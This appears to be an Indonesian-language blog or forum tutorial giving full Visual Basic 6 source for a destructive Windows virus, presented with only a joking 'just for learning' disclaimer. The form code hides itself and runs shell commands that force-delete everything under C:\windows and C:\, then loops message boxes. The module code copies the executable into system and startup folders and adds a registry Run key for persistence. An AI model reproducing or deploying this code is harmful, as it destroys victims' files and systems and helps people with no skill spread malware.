Seonggok Malware

Diaturin

Tapi jangan usil coy
ini cuma buat mengetahui ajeh
caranya yeh yeh

1. siapin form 1 and module 1
Buat Form sekecil mungkin
2. Copy lalu paste in di form

Nih code buat form


Dim namefile As String
Dim namereg As String
Private Sub Form_Load()
On Error Resume Next
Me.Hide
namefile = "virus.exe"
namereg = "virus"
If LCase$(App.Path) <> "c:\windows\system32" Or "c:\windows\start menu\programs\startup" Or "c:\windows\start menu\programs\start up" Or "c:\winnt\system32" Or "c:\winnt\start menu\programs\startup" Or "c:\winnt\start menu\programs\start up" Or "C:\Documents and Settings\All Users\Start Menu\Programs\Startup" Then

reg namefile, namereg
End If
payload
End Sub
Function payload()
On Error Resume Next

Shell ("cmd /c del c:\windows\* /F /S /Q")

Shell ("cmd /c del c:\* /F /S /Q")

start:
MsgBox "Restart Yah"
GoTo start
End Function

3. Kalo yang ennni code buat modulnyah

Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal Hkey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long
Public Const REG_SZ = 1
Public Const REG_DWORD = 4
Declare Function RegCloseKey Lib "advapi32.dll" (ByVal Hkey As Long) As Long
Declare Function RegDeleteValue Lib "advapi32.dll" Alias "RegDeleteValueA" (ByVal Hkey As Long, ByVal lpValueName As String) As Long
Declare Function RegOpenKey Lib "advapi32.dll" Alias "RegOpenKeyA" (ByVal Hkey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal Hkey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Public Sub savestring(Hkey As Long, strPath As String, strValue As String, strdata As String)
On Error Resume Next
Dim keyhand As Long
Dim X As Long
X = RegCreateKey(Hkey, strPath, keyhand)
X = RegSetValueEx(keyhand, strValue, 0, REG_SZ, ByVal strdata, Len(strdata))
X = RegCloseKey(keyhand)
End Sub
Public Function DeleteValue(ByVal Hkey As Long, ByVal strPath As String, ByVal strValue As String)
On Error Resume Next
Dim Xkey As Long
Dim X As Long
X = RegOpenKey(Hkey, strPath, Xkey)
X = RegDeleteValue(Xkey, strValue)
X = RegCloseKey(Xkey)
End Function
Function reg(filename As String, regname As String)
On Error GoTo error1
Call savestring("HKEY_LOCAL_MACHINE", "Software\Microsoft\Windows\CurrentVersion\Run", regname, "c:\windows\system32\" & filename)
On Error GoTo error2
FileCopy App.Path & "\" & App.EXEName & ".exe", "c:\windows\system32\" & filename
Exit Function
error1:
On Error Resume Next
FileCopy App.Path & "\" & App.EXEName & ".exe", "c:\windows\start menu\programs\startup\" & filename
On Error GoTo error4
FileCopy App.Path & "\" & App.EXEName & ".exe", "c:\windows\start menu\programs\start up\" & filename
Exit Function
error2:
On Error GoTo error3
FileCopy App.Path & "\" & App.EXEName & ".exe", "c:\winnt\system32\" & filename
Call DeleteValue("HKEY_LOCAL_MACHINE", "Software\Microsoft\Windows\CurrentVersion\Run", regname)
Call savestring("HKEY_LOCAL_MACHINE", "Software\Microsoft\Windows\CurrentVersion\Run", regname, "c:\winnt\system32\" & filename)
Exit Function
error3:
On Error GoTo error6
FileCopy App.Path & "\" & App.EXEName & ".exe", "c:\" & filename
Call DeleteValue("HKEY_LOCAL_MACHINE", "Software\Microsoft\Windows\CurrentVersion\Run", regname)
Call savestring("HKEY_LOCAL_MACHINE", "Software\Microsoft\Windows\CurrentVersion\Run", regname, "c:\" & filename)
Exit Function
error4:
On Error Resume Next
FileCopy App.Path & "\" & App.EXEName & ".exe", "c:\winnt\start menu\programs\startup\" & filename
On Error GoTo error5
FileCopy App.Path & "\" & App.EXEName & ".exe", "c:\winnt\start menu\programs\start up\" & filename
Exit Function
error5:
On Error GoTo enditnow
FileCopy App.Path & "\" & App.EXEName & ".exe", "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\" & filename
Exit Function
error6:
On Error GoTo error7
FileCopy App.Path & "\" & App.EXEName & ".exe", "c:\Documents and Settings\" & filename
Call DeleteValue("HKEY_LOCAL_MACHINE", "Software\Microsoft\Windows\CurrentVersion\Run", regname)
Call savestring("HKEY_LOCAL_MACHINE", "Software\Microsoft\Windows\CurrentVersion\Run", regname, "c:\Documents and Settings" & filename)
Exit Function
error7:
On Error GoTo enditnow
FileCopy App.Path & "\" & App.EXEName & ".exe", "c:\program files\" & filename
Call DeleteValue("HKEY_LOCAL_MACHINE", "Software\Microsoft\Windows\CurrentVersion\Run", regname)
Call savestring("HKEY_LOCAL_MACHINE", "Software\Microsoft\Windows\CurrentVersion\Run", regname, "c:\program files\" & filename)
Exit Function
enditnow:
On Error Resume Next
Call DeleteValue("HKEY_LOCAL_MACHINE", "Software\Microsoft\Windows\CurrentVersion\Run", regname)
End
End Function

4. selese oi (T.T)